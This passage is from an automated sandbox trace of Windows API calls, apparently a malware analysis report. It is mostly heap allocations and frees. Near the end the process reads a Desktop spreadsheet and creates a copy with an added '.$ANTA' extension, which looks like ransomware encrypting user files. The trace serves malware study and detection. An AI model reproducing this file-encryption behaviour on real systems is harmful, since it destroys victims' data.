out: hHeap=0x1780000) returned 1 [0124.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0124.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0124.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0124.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0124.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0124.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0124.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9578 | out: hHeap=0x1780000) returned 1 [0124.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0124.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0124.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0124.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0124.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0124.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0124.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0124.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0124.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0124.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0124.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0124.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0124.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0124.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0124.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0124.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0124.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0124.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0124.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0124.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0124.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0124.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0124.134] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0124.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0124.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0124.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0124.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0124.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0124.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0124.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0124.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0124.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0124.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0124.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0124.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0124.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0124.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0124.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0124.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0124.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0124.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0124.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0124.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0124.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0124.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0124.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0124.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0124.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0124.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0124.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0124.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0124.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0124.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0124.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0124.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0124.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0124.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0124.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0124.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0124.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0124.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0124.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0124.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0124.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0124.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0124.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0124.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0124.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0124.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0124.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0124.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0124.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0124.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0124.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0124.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0124.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0124.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0124.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0124.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0124.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0124.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0124.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0124.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0124.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0124.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0124.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0124.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0124.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0124.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0124.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0124.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0124.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0124.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0124.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0124.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0124.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0124.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0124.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0124.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0124.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0124.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0124.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0124.136] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0124.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e99c8 [0124.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0124.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0124.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0124.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0124.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0124.136] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0124.137] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0124.145] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0124.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0124.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0124.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0124.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0124.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0124.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0124.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0124.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0124.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0124.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb450 [0124.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0124.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0124.145] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\mA8Gl8nzr8.xlsx" (normalized: "c:\\users\\fd1hvy\\desktop\\ma8gl8nzr8.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0124.146] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.146] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0124.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0124.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0124.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0124.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0124.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0124.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0124.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0124.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0124.146] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0124.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0124.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0124.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0124.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0124.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0124.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0124.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0124.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0124.146] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0124.146] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0124.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0124.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0124.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0124.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0124.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0124.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0124.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0124.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0124.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0124.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0124.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0124.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0124.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0124.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0124.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0124.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0124.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0124.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0124.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0124.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0124.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0124.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0124.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0124.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0124.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0124.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920a0 [0124.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0124.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359ad0 [0124.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0124.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43921f0 [0124.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0124.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923e8 [0124.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359ad0 | out: hHeap=0x1780000) returned 1 [0124.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0124.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0124.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0124.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920a0 | out: hHeap=0x1780000) returned 1 [0124.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0124.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43921f0 | out: hHeap=0x1780000) returned 1 [0124.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0124.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0124.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0124.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0124.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0124.148] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0124.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0124.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0124.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43923e8 | out: hHeap=0x1780000) returned 1 [0124.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0124.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0124.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0124.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0124.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0124.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0124.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0124.148] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\mA8Gl8nzr8.xlsx.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\ma8gl8nzr8.xlsx.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0124.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0124.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0124.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0124.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0124.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0124.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0124.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0124.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0124.149] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0124.149] 